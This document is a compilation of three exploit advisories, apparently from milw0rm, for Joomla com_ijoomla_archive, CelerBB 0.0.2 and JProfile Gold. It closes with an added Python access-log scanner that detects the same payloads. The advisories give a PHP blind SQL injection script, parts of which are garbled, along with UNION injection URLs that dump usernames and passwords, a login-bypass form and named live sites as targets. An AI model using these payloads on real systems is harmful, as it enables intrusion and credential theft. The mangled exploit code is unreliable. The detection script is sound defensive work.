<?php
/*
Joomla com_ijoomla_archive Blind SQL Injection Exploit
AUTHOR : Mountassif Moad
DATE : 5 March 2009
APPLICATION : Joomla com_ijoomla_archive
DORK : inurl:"com_ijoomla_archive"
*/
ini_set("max_execution_time",0);
print_r('
com_ijoomla_archive Blind SQL Injection Exploit
php '.$argv[0].' http://www.site.com/ real id
Demo :
php '.$argv[0].' http://thecatholicspirit.com/ 17
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < userid =" 1;" userid =" $argv[2];" r =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid="" 1="1" w =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid="" 1="0" t =" abs((100-($w/$r*100)));" j =" 1;" i =" 46;" i="$i+2)" i ="="" i =" 98;" laenge =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid=""> $t-1) {
$laenge = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1).""));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
} else {
echo "\nExploiting failed: find another site\n";
}
?>
# milw0rm
CelerBB 0.0.2 Multiple Remote Vulnerabilities
Application: CelerBB
Version: 0.0.2
Website: http://celerbb.sourceforge.net/
Bugs: [A] Multiple SQL Injection
[B] Information Disclosure
[C] Authentication Bypass
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: viewforum.php, viewtopic.php
This bug allows a guest to view username and
password list.
- [B] Information Disclosure
Requisites: none
File affected: showme.php
This bug allows a guest to view reserved
information of any user.
- [C] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: login.php
This bug allows a guest to bypass authentication.
Code
- [A] Multiple SQL Injection
http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23
- [B] Information Disclosure
http://www.site.com/path/showme.php?user=admin
- [C] Authentication Bypass
<html>
<head>
<title>CelerBB 0.0.2 Authentication Bypass Exploit</title>
</head>
<body>
<form action="login.php" method="POST">
<input type="hidden" name="Username" value="admin'#">
<input type="submit" value="Exploit">
</form>
</body>
</html>
Fix
No fix.
# milw0rm
Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew, stop gaming all the time :p
# milw0rm
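As an added defender-side example, not part of any of the advisories above: a Python scanner that URL-decodes the request path of each access-log line, flags the three payload shapes these advisories share (UNION-based dumps, `ascii(substring(` blind probes, trailing MySQL comments), and reports any source that sends a burst of blind probes, which is what the length-differential extraction loop in the com_ijoomla_archive exploit produces. The log format, IP addresses and log lines are constructed for the example; the login.php bypass travels in a POST body and so does not appear in a common-format access log.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes in the advisories above; each is
# applied to the URL-decoded, lower-cased query string of a logged request.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),  # UNION-based dumps
    "blind_ascii": re.compile(r"ascii\s*\(\s*substring\s*\("),   # char-by-char blind probes
    "comment_trunc": re.compile(r"(--|#)\s*$"),                  # trailing MySQL comment (%23, --)
}
# Apache common/combined log line: only the source IP and request path are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+)')

# Constructed sample log (not real traffic): a blind-extraction burst from
# 198.51.100.7, two UNION dumps from 203.0.113.9, and one benign request.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Mar/2009:10:00:01 +0000] "GET /index.php?option=com_ijoomla_archive&task=archive&act=search&catid=17+and+ascii(substring((select+password+from+jos_users+limit+0,1),1,1))%3E64 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Mar/2009:10:00:02 +0000] "GET /index.php?option=com_ijoomla_archive&task=archive&act=search&catid=17+and+ascii(substring((select+password+from+jos_users+limit+0,1),1,1))%3E96 HTTP/1.1" 200 910',
    '198.51.100.7 - - [05/Mar/2009:10:00:03 +0000] "GET /index.php?option=com_ijoomla_archive&task=archive&act=search&catid=17+and+ascii(substring((select+password+from+jos_users+limit+0,1),1,1))%3E80 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Mar/2009:10:05:00 +0000] "GET /path/viewforum.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,GROUP_CONCAT(CONCAT(username,0x3a,password)),4,5,6,7,8%20FROM%20celer_users%23 HTTP/1.1" 200 3300',
    '203.0.113.9 - - [05/Mar/2009:10:06:00 +0000] "GET /index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20-- HTTP/1.1" 200 2800',
    '192.0.2.4 - - [05/Mar/2009:10:07:00 +0000] "GET /index.php?option=com_ijoomla_archive&task=archive&act=search&catid=17 HTTP/1.1" 200 5120',
]

def classify_request(path):
    """Return the set of signature names hit by one request path."""
    query = path.split("?", 1)[1] if "?" in path else ""
    # Decode twice: once for '+' and %XX, again in case the payload was double-encoded.
    query = unquote_plus(unquote_plus(query)).lower()
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}

def scan_log(lines, blind_threshold=3):
    """Return (findings, blind_sources): findings holds one (ip, path, hits) per
    matching request; blind_sources lists IPs that sent >= blind_threshold
    blind_ascii probes, the burst a length-differential extraction loop produces."""
    findings, blind_counts = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["path"])
        if hits:
            findings.append((m["ip"], m["path"], hits))
        if "blind_ascii" in hits:
            blind_counts[m["ip"]] += 1
    blind_sources = sorted(ip for ip, n in blind_counts.items() if n >= blind_threshold)
    return findings, blind_sources
```

Calling `scan_log(SAMPLE_LOG)` flags five of the six constructed requests and names 198.51.100.7 as a blind-extraction source; lowering `blind_threshold` trades false positives for earlier alerts.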